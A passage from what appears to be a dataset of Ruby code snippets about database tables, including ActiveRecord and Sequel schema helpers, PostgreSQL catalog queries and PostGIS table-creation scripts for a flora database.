(info.columns[-1].primary_key = row[:primary_key] == 'YES') rescue nil # pk > rdbi 0.9.1\n end\n return unless info.columns.length > 0\n info.tables << tbl\n info\n end",
"def quoted_table_name\n case self.connection.adapter_name\n when 'PostgreSQL'\n original_quoted_table_name.downcase\n else\n original_quoted_table_name\n end\n end",
"def extend_sql_avoiding_table_naming_clashes!(sql, addition)\r\n used_table_aliases = table_aliases_from_join_fragment(addition)\r\n old_table_aliases = table_aliases_from_join_fragment(sql)\r\n (used_table_aliases & old_table_aliases).each do |join_table_alias|\r\n i = 0\r\n begin\r\n i += 1\r\n new_alias = \"renamed_join_table_#{i}\"\r\n end until !used_table_aliases.include?(new_alias)\r\n convert_table_name_to_new_alias!(sql, join_table_alias, new_alias)\r\n end\r\n sql << \" #{addition} \"\r\n end",
"def test_table_metadata_contains_extensions\n skip(\"The extensions property on a table was introduced in Cassandra 3.0\") if CCM.cassandra_version < '3.0.0'\n\n assert @cluster.keyspace('simplex').has_table?('users')\n table_meta = @cluster.keyspace('simplex').table('users')\n assert_empty table_meta.options.extensions\n end",
"def copy_polymorphic_tables\n self.polymorphic_tables.each do |t|\n polymorphic_id_col, polymorphic_type_col = \"#{t.polymorphic_as}_id\", \"#{t.polymorphic_as}_type\"\n sql_connection.select_rows(t.sql_name) do |rows, page, total_pages|\n Mongify::Status.publish('copy_polymorphic', :size => rows.count, :name => \"Polymorphicizing #{t.name}\", :action => 'add')\n rows.each do |row|\n\n #If no data is in the column, skip importing\n if (row[polymorphic_type_col])\n table_name = row[polymorphic_type_col].tableize\n new_id = no_sql_connection.get_id_using_pre_mongified_id(table_name, get_type_casted_value(t, polymorphic_id_col, row))\n end\n\n row = t.translate(row)\n row[polymorphic_id_col] = new_id if new_id\n row.merge!(fetch_reference_ids(t, row))\n row.delete('pre_mongified_id')\n\n if t.embedded? && table_name\n row.delete(polymorphic_id_col)\n row.delete(polymorphic_type_col)\n save_function_call = t.embedded_as_object? ? '$set' : '$addToSet'\n no_sql_connection.update(table_name, new_id, {save_function_call => {t.name => row}})\n else\n no_sql_connection.insert_into(t.name, row)\n end\n\n Mongify::Status.publish('copy_polymorphic')\n end\n Mongify::Status.publish('copy_polymorphic', :action => 'finish')\n end\n end\n end",
"def real_table_name\n packageid.gsub('.', '_')\n end",
"def create_tables_in_test_schema\n ActiveRecord::Schema.define(version: 1) do\n ActiveRecord::Base.connection.ddl_batch do\n create_table :all_types, id: { limit: 8 } do |t|\n t.column :col_string, :string\n t.column :col_int64, :bigint\n t.column :col_float64, :float\n t.column :col_numeric, :numeric\n t.column :col_bool, :boolean\n t.column :col_bytes, :binary\n t.column :col_date, :date\n t.column :col_timestamp, :datetime\n t.column :col_json, :json\n\n t.column :col_array_string, :string, array: true\n t.column :col_array_int64, :bigint, array: true\n t.column :col_array_float64, :float, array: true\n t.column :col_array_numeric, :numeric, array: true\n t.column :col_array_bool, :boolean, array: true\n t.column :col_array_bytes, :binary, array: true\n t.column :col_array_date, :date, array: true\n t.column :col_array_timestamp, :datetime, array: true\n t.column :col_array_json, :json, array: true\n end\n\n create_table :firms do |t|\n t.string :name\n t.integer :rating\n t.string :description\n t.references :account\n end\n\n create_table :customers do |t|\n t.string :name\n end\n\n create_table :accounts do |t|\n t.references :customer, index: false\n t.references :firm, index: false\n t.string :name\n t.integer :credit_limit\n t.integer :transactions_count\n end\n\n create_table :transactions do |t|\n t.float :amount\n t.references :account, index: false\n end\n\n create_table :departments do |t|\n t.string :name\n t.references :resource, polymorphic: true, index: { name: \"index_departments_on_resource\" }\n end\n\n create_table :member_types do |t|\n t.string :name\n end\n\n create_table :members do |t|\n t.string :name\n t.references :member_type, index: false\n t.references :admittable, polymorphic: true, index: false\n end\n\n create_table :memberships do |t|\n t.datetime :joined_on\n t.references :club, index: false\n t.references :member, index: false\n t.boolean :favourite\n end\n\n create_table :clubs do |t|\n t.string :name\n end\n\n create_table :authors do |t|\n t.string :name, null: false\n t.date :registered_date\n t.references :organization, index: false\n end\n\n create_table :posts do |t|\n t.string :title\n t.string :content\n t.references :author\n t.integer :comments_count\n t.date :post_date\n t.time :published_time\n end\n\n create_table :comments do |t|\n t.string :comment\n t.references :post, index: false, foreign_key: true\n end\n\n create_table :addresses do |t|\n t.string :line1\n t.string :postal_code\n t.string :city\n t.references :author, index: false\n end\n\n create_table :organizations do |t|\n t.string :name\n t.datetime :last_updated, allow_commit_timestamp: true\n end\n\n create_table :singers, id: false do |t|\n t.primary_key :singerid\n t.column :first_name, :string, limit: 200\n t.string :last_name\n t.integer :tracks_count\n t.integer :lock_version\n t.virtual :full_name, type: :string, as: \"COALESCE(first_name || ' ', '') || last_name\", stored: true\n end\n\n create_table :albums, id: false do |t|\n t.interleave_in :singers\n t.primary_key :albumid\n # `singerid` is part of the primary key in the table definition, but it is not visible to ActiveRecord as part of\n # the primary key, to prevent ActiveRecord from considering this to be an entity with a composite primary key.\n t.parent_key :singerid\n t.string :title\n t.integer :lock_version\n end\n\n create_table :tracks, id: false do |t|\n # `:cascade` causes all tracks that belong to an album to automatically be deleted when an album is deleted.\n t.interleave_in :albums, :cascade\n t.primary_key :trackid\n t.parent_key :singerid\n t.parent_key :albumid\n t.string :title\n t.numeric :duration\n t.integer :lock_version\n end\n\n add_index :tracks, [:singerid, :albumid, :title], interleave_in: :albums, null_filtered: true, unique: false\n\n end\n end\nend",
"def table_name\n must_be_defined_in_derived_class\n end",
"def tables(opts=OPTS, &block)\n pg_class_relname(['r', 'p'], opts, &block)\n end",
"def extended_types\n EXTENDED_DATABASE_TYPES\n end",
"def create_table\n raise \"Need to implement abstract method.\" \n end",
"def schema_parse_table(table_name, opts)\n m = output_identifier_meth(opts[:dataset])\n\n _schema_ds.where_all(Sequel[:pg_class][:oid]=>regclass_oid(table_name, opts)).map do |row|\n row[:default] = nil if blank_object?(row[:default])\n if row[:base_oid]\n row[:domain_oid] = row[:oid]\n row[:oid] = row.delete(:base_oid)\n row[:db_domain_type] = row[:db_type]\n row[:db_type] = row.delete(:db_base_type)\n else\n row.delete(:base_oid)\n row.delete(:db_base_type)\n end\n\n db_type = row[:db_type]\n row[:type] = if row.delete(:is_array)\n schema_array_type(db_type)\n else\n send(TYPTYPE_METHOD_MAP[row.delete(:typtype)], db_type)\n end\n identity = row.delete(:attidentity)\n if row[:primary_key]\n row[:auto_increment] = !!(row[:default] =~ /\\A(?:nextval)/i) || identity == 'a' || identity == 'd'\n end\n\n # :nocov:\n if server_version >= 90600\n # :nocov:\n case row[:oid]\n when 1082\n row[:min_value] = MIN_DATE\n row[:max_value] = MAX_DATE\n when 1184, 1114\n if Sequel.datetime_class == Time\n row[:min_value] = MIN_TIMESTAMP\n row[:max_value] = MAX_TIMESTAMP\n end\n end\n end\n\n [m.call(row.delete(:name)), row]\n end\n end",
"def schema\n execute(<<-eosql).collect { |row| row[0] }.collect { |t| table_schema(t) }\nSELECT rdb$relation_name FROM rdb$relations WHERE rdb$system_flag != 1\neosql\n end",
"def copy_table_structure(rdb,tbl)\n template = \"SELECT sql, type from X.sqlite_master WHERE tbl_name = ? ORDER BY type DESC\"\n lsql = template.gsub('X',\"main\")\n rsql = template.gsub('X',quote_with_dots(rdb))\n args = [quote_with_dots(tbl)]\n lschema = sqlite_execute(lsql,args)\n rschema = sqlite_execute(rsql,args)\n if lschema.length>0\n return false\n end\n rschema.each{ |row| sqlite_execute(row[0],[]) }\n true\n end",
"def copy_table_structure(rdb,tbl)\n template = \"SELECT sql, type from X.sqlite_master WHERE tbl_name = ? ORDER BY type DESC\"\n lsql = template.gsub('X',\"main\")\n rsql = template.gsub('X',quote_with_dots(rdb))\n args = [quote_with_dots(tbl)]\n lschema = sqlite_execute(lsql,args)\n rschema = sqlite_execute(rsql,args)\n if lschema.length>0\n return false\n end\n rschema.each{ |row| sqlite_execute(row[0],[]) }\n true\n end",
"def copy_table_structure(rdb,tbl)\n template = \"SELECT sql, type from X.sqlite_master WHERE tbl_name = ? ORDER BY type DESC\"\n lsql = template.gsub('X',\"main\")\n rsql = template.gsub('X',quote_with_dots(rdb))\n args = [quote_with_dots(tbl)]\n lschema = sqlite_execute(lsql,args)\n rschema = sqlite_execute(rsql,args)\n if lschema.length>0\n return false\n end\n rschema.each{ |row| sqlite_execute(row[0],[]) }\n true\n end",
"def add_piggy_back_sql_data!(reflection_name, prefix, table_alias, attributes, select, joins, conditions, join_type)\n ktn = table_name\n kpkey = primary_key\n reflection = reflections[reflection_name]\n atn = reflection.table_name\n attributes.each do |attr|\n if table_alias\n select << \", #{table_alias}.#{attr} AS #{prefix}_#{attr}\"\n else\n select << \", #{atn}.#{attr} AS #{prefix}_#{attr}\"\n end\n end\n fkey = reflection.primary_key_name\n fpkey = reflection.klass.primary_key\n\n case reflection.macro\n when :belongs_to\n if table_alias\n joins << \" #{join_type} JOIN #{atn} #{table_alias} ON #{table_alias}.#{fpkey}=#{ktn}.#{fkey} \"\n else\n joins << \" #{join_type} JOIN #{atn} ON #{atn}.#{fpkey}=#{ktn}.#{fkey} \"\n end\n when :has_one\n if table_alias\n joins << \" #{join_type} JOIN #{atn} #{table_alias} ON #{table_alias}.#{fkey}=#{ktn}.#{kpkey} \"\n else\n joins << \" #{join_type} JOIN #{atn} ON #{atn}.#{fkey}=#{ktn}.#{kpkey} \"\n end\n when :has_many\n raise \"piggy_back: aliasing not implemented for has_many\" if table_alias\n if reflection.options[:through]\n ttn = reflection.through_reflection.klass.table_name\n tkfkey = reflection.through_reflection.primary_key_name\n tafkey = reflection.source_reflection.primary_key_name\n\n through_conditions = reflection.options[:conditions] ?\n \" AND \" + reflection.options[:conditions] : \"\"\n source_conditions = reflection.through_reflection.options[:conditions] ?\n \" AND \" + reflection.through_reflection.options[:conditions] : \"\"\n\n joins << \" LEFT JOIN #{ttn} ON (#{ttn}.#{tkfkey}=#{ktn}.#{kpkey}#{through_conditions})\"\n joins << \" LEFT JOIN #{atn} ON (#{ttn}.#{tafkey}=#{atn}.#{fpkey}#{source_conditions}) \"\n else\n reflection_conditions = reflection.options[:conditions] ?\n \" AND \" + reflection.options[:conditions] : \"\"\n\n joins << \" LEFT JOIN #{atn} ON (#{atn}.#{fkey}=#{ktn}.#{kpkey}#{reflection_conditions}) \"\n end\n else\n raise \"can't piggy back #{reflection.macro} on class #{klass}\"\n end\n end",
"def table_filter(schemaName, tblName, tblType)\n [\"information_schema\", \"pg_catalog\"].include?(schemaName) || tblType !~ /TABLE/i\n end",
"def schema_ds_filter(table_name, opts)\n if table_name\n [{:c__table_name=>table_name.to_s}]\n else\n [{:t__table_type=>'BASE TABLE'}]\n end\n end",
"def on_table?; @on_table; end",
"def replace_tables_text(v)\n t = sanitize_sql(v)\n (table_extended_with.collect(&:table) | [table_name]).each do |cur_tab|\n t.gsub!(/(\\W|\\A)#{cur_tab}(\\W)/i) {\"#{$1}#{extended_table_name}#{$2}\"}\n end\n t\n end",
"def aliased_table_name_for_with_sqlserver_support(name,suffix=nil)\n if !parent.table_joins.blank? && parent.table_joins.to_s.downcase =~ %r{join(\\s+\\w+)?\\s+#{Regexp.escape(active_record.connection.quote_table_name(name.downcase))}\\son}i\n @join_dependency.table_aliases[name] += 1\n end\n unless @join_dependency.table_aliases[name].zero?\n # if the table name has been used, then use an alias\n name = active_record.connection.table_alias_for \"#{pluralize(reflection.name)}_#{parent_table_name}#{suffix}\"\n table_index = @join_dependency.table_aliases[name]\n @join_dependency.table_aliases[name] += 1\n name = name[0..active_record.connection.table_alias_length-3] + \"_#{table_index+1}\" if table_index > 0\n else\n @join_dependency.table_aliases[name] += 1\n end\n name\n end",
"def find_column_and_table(path, base)\n if path.length > 1\n find_column_and_table(path[1..-1], base.reflect_on_association(path.first.to_sym).class_name.constantize)\n else\n [base.columns_hash[path.first.to_s], base]\n end\n end",
"def supports_indexes_on_partitioned_tables?\n postgresql_version >= 110_000\n end",
"def tables\n [\n ]\n end",
"def load_table_schema(conn, builder, table)\n builder.relvar(table){\n primary_key_columns = load_table_heading(conn, builder, table)\n load_table_constraints(conn, builder, table, primary_key_columns)\n }\n end",
"def quote_identifier_append(sql, name)\n name = (table_mappings[name.to_sym] || name) if name.respond_to?(:to_sym)\n super(sql, name)\n end",
"def schema_ds_from(table_name, opts)\n [:information_schema__tables___t]\n end",
"def combine_polymorphic_foreign_keys\n @index_columns.each do |_table, foreign_keys|\n foreign_id_keys = foreign_keys.select { |key| key.size == 1 && key.first =~ /_id/ }\n foreign_type_keys = foreign_keys.select { |key| key.size == 1 && key.first =~ /_type/ }\n foreign_id_keys.each do |id_key|\n next unless type_key =\n foreign_type_keys.detect { |type_key| type_key.first == id_key.first.sub(/_id/, '') + '_type' }\n\n foreign_keys.delete(id_key)\n foreign_keys.delete(type_key)\n foreign_keys << id_key + type_key\n end\n end\n end",
"def ignored_translation_table_colums(klass); end",
"def schema_and_table_name\n if qualified_table_name.include? '.'\n schema_name, table_name = qualified_table_name.split('.', 2)\n else\n table_name = qualified_table_name\n schema_name = self.class.default_schema_name\n end\n [schema_name, table_name]\n end",
"def parent_tables(table_name)\n result = exec_query(<<-SQL, 'SCHEMA')\n SELECT pg_namespace.nspname, pg_class.relname\n FROM pg_catalog.pg_inherits\n INNER JOIN pg_catalog.pg_class ON (pg_inherits.inhparent = pg_class.oid)\n INNER JOIN pg_catalog.pg_namespace ON (pg_class.relnamespace = pg_namespace.oid)\n WHERE inhrelid = '#{table_name}'::regclass\n SQL\n result.map { |a| a['relname'] }\n end",
"def import_table( table )\n # This must come first, so we can exclude foreign key indexes later.\n import_foreign_keys( table )\n import_indexes( table )\n import_columns( table )\n end",
"def add_tables_to_publication(name, tables)\n typed_exec(\"ALTER PUBLICATION #{connection.quote_ident(name)} ADD TABLE #{safe_list(tables)}\")\n end",
"def get_table(object)\n raise NotImplementedError, \"Subclasses must implement private method get_table\"\n end",
"def table_prefix component, use_table_name = nil\n case use_table_name\n when false, nil\n ''\n when true\n safe_table_name(component)+'.'\n else\n use_table_name+'.'\n end\n end",
"def tablename; datastore['TABLENAME']; end",
"def create_tables\n DB.create_table? :event_templates do\n primary_key :id, :type => :uuid\n String :title, :unique=>true\n String :duration\n String :description\n String :status\n end\n\n DB.create_table? :events do\n primary_key :id, :type => :uuid\n foreign_key :event_template_id, :type => :uuid\n String :title\n String :duration\n String :description\n String :date\n String :start_time\n String :timezone\n String :cohort\n Integer :cohort_id\n String :income_amount\n String :income_currency\n String :utc_time\n\n end\n\n DB.create_table? :coaches do\n primary_key :id\n String :name\n String :email\n String :image\n String :status\n end\n\n DB.create_table? :assigned_coaches do\n primary_key :id\n foreign_key :event_id, :type => :uuid\n foreign_key :coach_id\n end\n\n DB.create_table? :coach_fees do\n primary_key :id\n foreign_key :event_template_id, :type => :uuid\n foreign_key :event_id, :type => :uuid\n String :currency\n String :amount\n end\n\n DB.create_table? :timezones do\n primary_key :id\n String :name\n end\n\n DB.create_table? :cohorts do\n primary_key :id\n String :name\n String :status\n end\n\nend",
"def createTaxonTables(conn)\n\n\tconn.exec(\"DROP TABLE geo.ocorrencias;\")\n\tconn.exec(\"DROP TABLE geo.especies;\")\n\n\n\t## Table: geo.especies\n\tconn.exec(\"CREATE TABLE geo.especies\n\t\t\t(id integer NOT NULL,\n\t\t\t familia character varying(50) DEFAULT NULL::character varying,\n\t\t\t genero character varying(50) DEFAULT NULL::character varying,\n\t\t\t especie character varying(50) DEFAULT NULL::character varying,\n\t\t\t tipo character varying(50) DEFAULT NULL::character varying,\n\t\t\t infranome character varying(50) DEFAULT NULL::character varying,\n\t\t\t autor character varying(100) DEFAULT NULL::character varying,\n\t\t\t id_fb character varying(255),\n\t\t\t lifeform_fb character varying(255),\n\t\t\t CONSTRAINT especies_pkey PRIMARY KEY (id));\")\n\tconn.exec(\"ALTER TABLE geo.especies OWNER TO cncflora;\")\n\n\n\t## Table: geo.ocorrencias\n\tconn.exec(\"CREATE TABLE geo.ocorrencias\n\t\t\t(codigocncflora serial NOT NULL,\n\t\t\t id integer,\n\t\t\t codigocolecao character varying(25) DEFAULT NULL::character varying,\n\t\t\t familia character varying(50) DEFAULT NULL::character varying,\n\t\t\t genero character varying(50) DEFAULT NULL::character varying,\n\t\t\t especie character varying(50) DEFAULT NULL::character varying,\n\t\t\t tipo character varying(10) DEFAULT NULL::character varying,\n\t\t\t infranome character varying(50) DEFAULT NULL::character varying,\n\t\t\t numerocatalogo character varying(15) DEFAULT NULL::character varying,\n\t\t\t numerocoletor character varying(15) DEFAULT NULL::character varying,\n\t\t\t coletor character varying(255) DEFAULT NULL::character varying,\n\t\t\t anocoleta character varying(10) DEFAULT NULL::character varying,\n\t\t\t mescoleta character varying(10) DEFAULT NULL::character varying,\n\t\t\t diacoleta character varying(10) DEFAULT NULL::character varying,\n\t\t\t determinador character varying(255) DEFAULT NULL::character varying,\n\t\t\t estado character varying(255) DEFAULT NULL::character varying,\n\t\t\t municipio character varying(255) DEFAULT NULL::character varying,\n\t\t\t localidade text,\n\t\t\t longitude double precision DEFAULT 0::double precision,\n\t\t\t latitude double precision DEFAULT 0::double precision,\n\t\t\t longcncflora double precision DEFAULT 0::double precision,\n\t\t\t latcncflora double precision DEFAULT 0::double precision,\n\t\t\t preccncflora character varying(50) DEFAULT NULL::character varying,\n\t\t\t metodocncflora character varying(50) DEFAULT NULL::character varying,\n\t\t\t obscncflora text,\n\t\t\t revisado smallint DEFAULT 0::smallint,\n\t\t\t valido smallint DEFAULT 0::smallint,\n\t\t\t longitudegis double precision DEFAULT 0::double precision,\n\t\t\t latitudegis double precision DEFAULT 0::double precision,\n\t\t\t geom geometry(Point,102033),\n\t\t\t CONSTRAINT ocorrencias_pkey PRIMARY KEY (codigocncflora),\n\t\t\t CONSTRAINT ocorrencias_id_fkey FOREIGN KEY (id) REFERENCES geo.especies (id));\")\n\tconn.exec(\"ALTER TABLE geo.ocorrencias OWNER TO cncflora;\")\nend",
"def table; end",
"def table; end",
"def table; end",
"def table; end",
"def table_name\n @table_name ||= (superclass == SmallRecord::Base) ? default_table_name : superclass.table_name\n end",
"def extra_columns(base, columns, sub_columns)\n return if @query.is_a?(String) || @sub_query.is_a?(String)\n\n # Add the connect attribute to the query\n if defined?(@connect)\n columns.unshift(@query.arel_table[@connect[0]])\n sub_columns.unshift(@sub_query.arel_table[@connect[0]])\n end\n\n # Build a column to represent the depth of the recursion\n if @depth.present?\n name, start, as = @depth\n col = table[name]\n base.select_extra_values += [col.as(as)] unless as.nil?\n\n columns << ::Arel.sql(start.to_s).as(name)\n sub_columns << (col + ::Arel.sql('1')).as(name)\n end\n\n # Build a column to represent the path of the record access\n if @path.present?\n name, source, as = @path\n source = @query.arel_table[source || @connect[0]]\n\n col = table[name]\n base.select_extra_values += [col.as(as)] unless as.nil?\n parts = [col, source.cast(:varchar)]\n\n columns << ::Arel.array([source]).cast(:varchar, true).as(name)\n sub_columns << ::Arel::Nodes::NamedFunction.new('array_append', parts).as(name)\n end\n end",
"def tables\n raise 'SevenZip#tables should never be called'\n end",
"def _table_name\n self.class.table_name\n end",
"def _table; @table end",
"def table\n Airmodel.client.table base_config[:base_id], base_config[:table_name]\n end",
"def tables; ActiveRecord::Base.connection.tables; end",
"def base_tables(name = nil)\n # this is untested\n select_values(\"SELECT table_name FROM information_schema.tables\", name)\n end",
"def change\n create_table :pages do |t|\n enable_extension \"hstore\" unless extension_enabled?(\"hstore\")\n t.hstore :settings\n t.timestamps\n end\nend",
"def table_alias_for(table_name)\n table_name.gsub(/\\./, '_')\n end",
"def table_name_prefix(model)\n return model::Base.table_name_prefix rescue \"\"\n end",
"def table_name\n raise \"You must override `table_name' in your class\"\n end",
"def extend_relation_class(klass)\n klass\n end",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def create_table_sql(name, generator, options)\n \"#{super}#{create_table_suffix_sql(name, options)}\"\n end",
"def table_name_for_insert\n self.class.to_s.downcase.pluralize\n end",
"def spawn_tables\n\t# pseudo-migration / schema\n\tif !FeedEntry.table_exists?\n\t\tprint \"Creating feed entry table...\\n\"\n\t\tActiveRecord::Base.connection.create_table(:feed_entries) do |t|\n\t\t\tt.column :name, :string\n\t\t\tt.column :content, :string\n\t\t\tt.column :url, :string\n\t\t\tt.column :guid, :string\n\t\t\tt.column :published_at, :datetime\n\t\t\tt.column :feed_id, :integer\n\t\tend\n\tend\n\tif !Feed.table_exists?\n\t\tprint \"Creating feed table...\\n\"\n\t\tActiveRecord::Base.connection.create_table(:feeds) do |t|\n\t\t\tt.column :url, :string\n\t\tend\n\tend\n\tif !Blacklist.table_exists?\n\t\tprint \"Creating blacklist table...\\n\"\n\t\tActiveRecord::Base.connection.create_table(:blacklists) do |t|\n\t\t\tt.column :word, :string\n\t\tend\n\tend\nend",
"def _schema_ds\n @_schema_ds ||= begin\n ds = metadata_dataset.select{[\n pg_attribute[:attname].as(:name),\n SQL::Cast.new(pg_attribute[:atttypid], :integer).as(:oid),\n SQL::Cast.new(basetype[:oid], :integer).as(:base_oid),\n SQL::Function.new(:format_type, basetype[:oid], pg_type[:typtypmod]).as(:db_base_type),\n SQL::Function.new(:format_type, pg_type[:oid], pg_attribute[:atttypmod]).as(:db_type),\n SQL::Function.new(:pg_get_expr, pg_attrdef[:adbin], pg_class[:oid]).as(:default),\n SQL::BooleanExpression.new(:NOT, pg_attribute[:attnotnull]).as(:allow_null),\n SQL::Function.new(:COALESCE, SQL::BooleanExpression.from_value_pairs(pg_attribute[:attnum] => SQL::Function.new(:ANY, pg_index[:indkey])), false).as(:primary_key),\n Sequel[:pg_type][:typtype],\n (~Sequel[Sequel[:elementtype][:oid]=>nil]).as(:is_array),\n ]}.\n from(:pg_class).\n join(:pg_attribute, :attrelid=>:oid).\n join(:pg_type, :oid=>:atttypid).\n left_outer_join(Sequel[:pg_type].as(:basetype), :oid=>:typbasetype).\n left_outer_join(Sequel[:pg_type].as(:elementtype), :typarray=>Sequel[:pg_type][:oid]).\n left_outer_join(:pg_attrdef, :adrelid=>Sequel[:pg_class][:oid], :adnum=>Sequel[:pg_attribute][:attnum]).\n left_outer_join(:pg_index, :indrelid=>Sequel[:pg_class][:oid], :indisprimary=>true).\n where{{pg_attribute[:attisdropped]=>false}}.\n where{pg_attribute[:attnum] > 0}.\n order{pg_attribute[:attnum]}\n\n # :nocov:\n if server_version > 100000\n # :nocov:\n ds = ds.select_append{pg_attribute[:attidentity]}\n\n # :nocov:\n if server_version > 120000\n # :nocov:\n ds = ds.select_append{Sequel.~(pg_attribute[:attgenerated]=>'').as(:generated)}\n end\n end\n\n ds\n end\n end",
"def column_definitions(table_name)\n fields = query(<<~SQL, \"SCHEMA\")\n SELECT a.attname, format_type(a.atttypid, a.atttypmod),\n pg_get_expr(d.adbin, d.adrelid), a.attnotnull, a.atttypid, a.atttypmod,\n c.collname, NULL AS comment,\n #{supports_virtual_columns? ? 'attgenerated' : quote('')} as attgenerated,\n NULL as is_hidden\n FROM pg_attribute a\n LEFT JOIN pg_attrdef d ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n LEFT JOIN pg_type t ON a.atttypid = t.oid\n LEFT JOIN pg_collation c ON a.attcollation = c.oid AND a.attcollation <> t.typcollation\n WHERE a.attrelid = #{quote(quote_table_name(table_name))}::regclass\n AND a.attnum > 0 AND NOT a.attisdropped\n ORDER BY a.attnum\n SQL\n\n crdb_fields = crdb_column_definitions(table_name)\n\n # Use regex comparison because if a type is an array it will\n # have [] appended to the end of it.\n target_types = [\n /geometry/,\n /geography/,\n /interval/,\n /numeric/\n ]\n\n re = Regexp.union(target_types)\n fields.map do |field|\n dtype = field[1]\n field[1] = crdb_fields[field[0]][2].downcase if re.match(dtype)\n field[7] = crdb_fields[field[0]][1]&.gsub!(/^\\'|\\'?$/, '')\n field[9] = true if crdb_fields[field[0]][3]\n field\n end\n fields.delete_if do |field|\n # Don't include rowid column if it is hidden and the primary key\n # is not defined (meaning CRDB implicitly created it).\n if field[0] == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n field[9] && !primary_key(table_name)\n else\n false # Keep this entry.\n end\n end\n end",
"def supports_drop_table_if_exists?\n supports_create_table_if_not_exists?\n end",
"def supports_table_listing?\n respond_to?(:tables)\n end",
"def table_structure(table_name)\r\n sql = \"SELECT COLUMN_NAME, IIF(COLUMN_DEF = 'NULL', null, COLUMN_DEF) as COLUMN_DEF, TYPE_NAME, NULLABLE from (EXECUTE PROCEDURE sp_GetColumns( NULL, NULL, '#{table_name}', NULL )) spgc where table_cat <> 'system';\"\r\n structure = execute(sql, :skip_logging)\r\n raise(ActiveRecord::StatementInvalid, \"Could not find table '#{table_name}'\") if structure == false\r\n structure\r\n end",
"def table_name\n model_class.table_name\n end",
"def table_name\n model_class.table_name\n end",
"def create_table_joins(klass)\n if join_tables = klass.ann(:self, :join_tables)\n for info in join_tables\n begin\n # UGGLY hack!\n key_type = klass.ann(:oid, :sql).split(\" \").first\n create_join_table_sql(info, key_type).each do |sql|\n exec(sql, false)\n end\n debug \"Created join table '#{info[:table]}'.\" if $DBG\n rescue Object => ex\n if table_already_exists_exception? ex\n debug \"Join table already exists\" if $DBG\n else\n raise\n end\n end\n end\n end\n end",
"def functional_update_schema # abstract\n raise 'abstract'\n end",
"def load_physical_schema(conn, builder)\n builder.indexes{\n conn.tables.each{|table|\n conn.indexes(table).each_pair{|name, defn|\n next if defn[:unique]\n builder.index(name, {:relvar => table, :attributes => defn[:columns]})\n }\n }\n }\n end",
"def createAnalisysTables(conn)\n\t\n\n\t## Table: geo.eoo\n\tconn.exec(\"DROP TABLE IF EXISTS geo.eoo;\")\n\tconn.exec(\"CREATE TABLE geo.eoo(\n\t\t\t gid serial NOT NULL,\n\t\t\t id integer NOT NULL,\n\t\t\t CONSTRAINT eoo_pkey PRIMARY KEY (id),\n\t\t\t CONSTRAINT eoo_id_fkey FOREIGN KEY (id) REFERENCES geo.especies (id));\")\n\tconn.exec(\"SELECT AddGeometryColumn ('geo','eoo','geom',102033,'POLYGON',2);\")\n\tconn.exec(\"ALTER TABLE geo.eoo OWNER TO cncflora;\")\n\n\n\n\t## Table: geo.aoo\n conn.exec(\"DROP TABLE IF EXISTS geo.aoo;\")\n conn.exec(\"CREATE TABLE geo.aoo\n (gid serial NOT NULL,\n id integer,\n CONSTRAINT aoo_id_fkey FOREIGN KEY (id) REFERENCES geo.especies (id));\")\n\tconn.exec(\"SELECT AddGeometryColumn ('geo','aoo','geom',102033,'POLYGON',2);\")\n conn.exec(\"ALTER TABLE geo.aoo OWNER TO cncflora;\")\n\n\n\n\t## Table: geo.subpopulacoes\n\tconn.exec(\"DROP TABLE IF EXISTS geo.subpopulacao_remanescente;\")\n\tconn.exec(\"DROP TABLE IF EXISTS geo.subpopulacao_rodovia;\")\n\tconn.exec(\"DROP TABLE IF EXISTS geo.subpopulacao_mineracao;\")\n\tconn.exec(\"DROP TABLE IF EXISTS geo.subpopulacao_uc;\")\n\t#conn.exec(\"DROP TABLE IF EXISTS geo.subpopulacao_terra_indigena;\")\n\tconn.exec(\"DROP TABLE IF EXISTS geo.subpopulacao_incendios;\")\n\n\tconn.exec(\"DROP TABLE IF EXISTS geo.subpopulacoes;\")\n\tconn.exec(\"CREATE TABLE geo.subpopulacoes(\n\t\t\t gid serial NOT NULL,\n\t\t\t id integer,\n\t\t\t area_total double precision DEFAULT 0.0,\t\t\t \n\t\t\t area_remanescente double precision DEFAULT 0.0,\n\t\t\t area_rodovia double precision DEFAULT 0.0,\n\t\t\t remanescentes_sob_rodovia double precision DEFAULT 0.0,\n\t\t\t area_minerada double precision DEFAULT 0.0,\t\t\t \n\t\t\t area_uc double precision DEFAULT 0.0,\n\t\t\t area_remanescente_uc double precision DEFAULT 0.0,\n\t\t\t area_terra_indigena double precision DEFAULT 0.0,\n\t\t\t area_remanescente_terra_indigena double precision DEFAULT 0.0,\n\t\t\t porcentagem_remanescente double precision DEFAULT 0.0,\n\t\t\t porcentagem_rodovia double precision DEFAULT 0.0,\n\t\t\t porcentagem_minerada double precision DEFAULT 0.0,\n\t\t\t porcentagem_remanescente_rodovia double precision DEFAULT 0.0,\n\t\t\t porcentagem_remanescente_uc double precision DEFAULT 0.0,\n\t\t\t porcentagem_remanescente_terra_indigena double precision DEFAULT 0.0,\n\t\t\t total_incendios integer,\n\t\t\t indice_incendios double precision DEFAULT 0.0,\n\t\t\t CONSTRAINT subpopulacoes_pkey PRIMARY KEY (gid),\n\t\t\t CONSTRAINT subpopulacoes_id_fkey FOREIGN KEY (id) REFERENCES geo.especies (id));\")\n\tconn.exec(\"SELECT AddGeometryColumn ('geo','subpopulacoes','geom',102033,'POLYGON',2);\")\n\tconn.exec(\"ALTER TABLE geo.subpopulacoes OWNER TO cncflora;\")\n\n\n\n\t## Table: geo.subpopulacao_remanescente (relacionamento entre subpopulação, remanescentes e espécies. Antiga tabela remanescente_especie)\n\tconn.exec(\"CREATE TABLE geo.subpopulacao_remanescente(\n\t\t\t gid serial,\n\t\t\t gid_subpop integer,\n\t\t\t gid_remanescente integer,\n\t\t\t id integer NOT NULL,\n\t\t\t CONSTRAINT subpopulacao_remanescente_gid_pkey PRIMARY KEY 